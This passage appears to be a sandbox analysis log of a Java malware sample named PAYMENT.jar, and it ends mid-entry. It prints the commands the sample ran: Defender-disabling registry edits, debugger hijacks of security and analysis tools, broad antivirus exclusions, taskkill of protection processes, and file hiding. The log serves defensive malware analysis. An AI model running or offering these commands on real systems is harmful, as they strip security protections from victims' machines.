PID 4944 wrote to memory of 2132	4944	cmd.exe	312
PID 4944 wrote to memory of 2132	4944	cmd.exe	312
PID 3056 wrote to memory of 4208	3056	java.exe	313
PID 3056 wrote to memory of 4208	3056	java.exe	313
PID 4208 wrote to memory of 1496	4208	cmd.exe	315
PID 4208 wrote to memory of 1496	4208	cmd.exe	315
PID 4208 wrote to memory of 5100	4208	cmd.exe	316
PID 4208 wrote to memory of 5100	4208	cmd.exe	316
PID 3056 wrote to memory of 4360	3056	java.exe	317
PID 3056 wrote to memory of 4360	3056	java.exe	317
PID 4360 wrote to memory of 4444	4360	cmd.exe	319
PID 4360 wrote to memory of 4444	4360	cmd.exe	319
PID 4360 wrote to memory of 2068	4360	cmd.exe	320
PID 4360 wrote to memory of 2068	4360	cmd.exe	320
PID 3056 wrote to memory of 4520	3056	java.exe	321
PID 3056 wrote to memory of 4520	3056	java.exe	321
PID 4520 wrote to memory of 4728	4520	cmd.exe	323
PID 4520 wrote to memory of 4728	4520	cmd.exe	323
PID 4520 wrote to memory of 4636	4520	cmd.exe	324
PID 4520 wrote to memory of 4636	4520	cmd.exe	324
PID 3056 wrote to memory of 4804	3056	java.exe	325
PID 3056 wrote to memory of 4804	3056	java.exe	325
PID 4804 wrote to memory of 4976	4804	cmd.exe	327
PID 4804 wrote to memory of 4976	4804	cmd.exe	327
PID 4804 wrote to memory of 5016	4804	cmd.exe	328
PID 4804 wrote to memory of 5016	4804	cmd.exe	328
PID 3056 wrote to memory of 5088	3056	java.exe	329
PID 3056 wrote to memory of 5088	3056	java.exe	329
PID 5088 wrote to memory of 4204	5088	cmd.exe	331
PID 5088 wrote to memory of 4204	5088	cmd.exe	331
PID 5088 wrote to memory of 2524	5088	cmd.exe	332
PID 5088 wrote to memory of 2524	5088	cmd.exe	332
PID 3056 wrote to memory of 4272	3056	java.exe	333
PID 3056 wrote to memory of 4272	3056	java.exe	333
PID 4272 wrote to memory of 4444	4272	cmd.exe	335
PID 4272 wrote to memory of 4444	4272	cmd.exe	335
PID 4272 wrote to memory of 4620	4272	cmd.exe	336
PID 4272 wrote to memory of 4620	4272	cmd.exe	336
PID 3056 wrote to memory of 4696	3056	java.exe	337
PID 3056 wrote to memory of 4696	3056	java.exe	337
PID 4696 wrote to memory of 4880	4696	cmd.exe	339
PID 4696 wrote to memory of 4880	4696	cmd.exe	339
PID 4696 wrote to memory of 4976	4696	cmd.exe	340
PID 4696 wrote to memory of 4976	4696	cmd.exe	340
PID 3056 wrote to memory of 2984	3056	java.exe	341
PID 3056 wrote to memory of 2984	3056	java.exe	341
PID 3056 wrote to memory of 2068	3056	java.exe	343
PID 3056 wrote to memory of 2068	3056	java.exe	343
PID 3056 wrote to memory of 2516	3056	java.exe	345
PID 3056 wrote to memory of 2516	3056	java.exe	345
PID 3056 wrote to memory of 4204	3056	java.exe	347
PID 3056 wrote to memory of 4204	3056	java.exe	347
PID 3056 wrote to memory of 4568	3056	java.exe	349
PID 3056 wrote to memory of 4568	3056	java.exe	349
PID 3056 wrote to memory of 3940	3056	java.exe	351
PID 3056 wrote to memory of 3940	3056	java.exe	351
PID 3056 wrote to memory of 4204	3056	java.exe	353
PID 3056 wrote to memory of 4204	3056	java.exe	353
PID 3056 wrote to memory of 4568	3056	java.exe	355
PID 3056 wrote to memory of 4568	3056	java.exe	355
PID 3056 wrote to memory of 4960	3056	java.exe	357
PID 3056 wrote to memory of 4960	3056	java.exe	357

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1416	attrib.exe
1588	attrib.exe
1752	attrib.exe
504	attrib.exe
904	attrib.exe
1060	attrib.exe
1152	attrib.exe
1240	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\PAYMENT.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3636
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3808
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3548
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:504
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:904
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\oWsdf\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1060
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\oWsdf\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1152
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\oWsdf
  2⤵
  - Views/modifies file attributes
  PID:1240
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\oWsdf
  2⤵
  - Views/modifies file attributes
  PID:1416
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\oWsdf
  2⤵
  - Views/modifies file attributes
  PID:1588
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class
  2⤵
  - Views/modifies file attributes
  PID:1752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:424
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2280
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3692
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2108
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3652
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:3048
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:572
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:640
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1252
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1440
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2524
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2920
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:508
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1244
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2744
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2464
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1080
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1748
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1268
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3048
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1604
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:648
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:2144
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3508
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:2168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1604
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1280
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1028
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:540
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3076
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:3692
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2052
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:4144
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:4200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4220
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:4348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:4368
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4440
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4512
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4608
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4724
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4800
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:5004
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:5068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:5088
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:2516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:2052
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4216
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4320
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1264
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:1008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:3796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4580
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4932
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:5000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4208
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5080
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4212
- - C:\Windows\system32\reg.exe
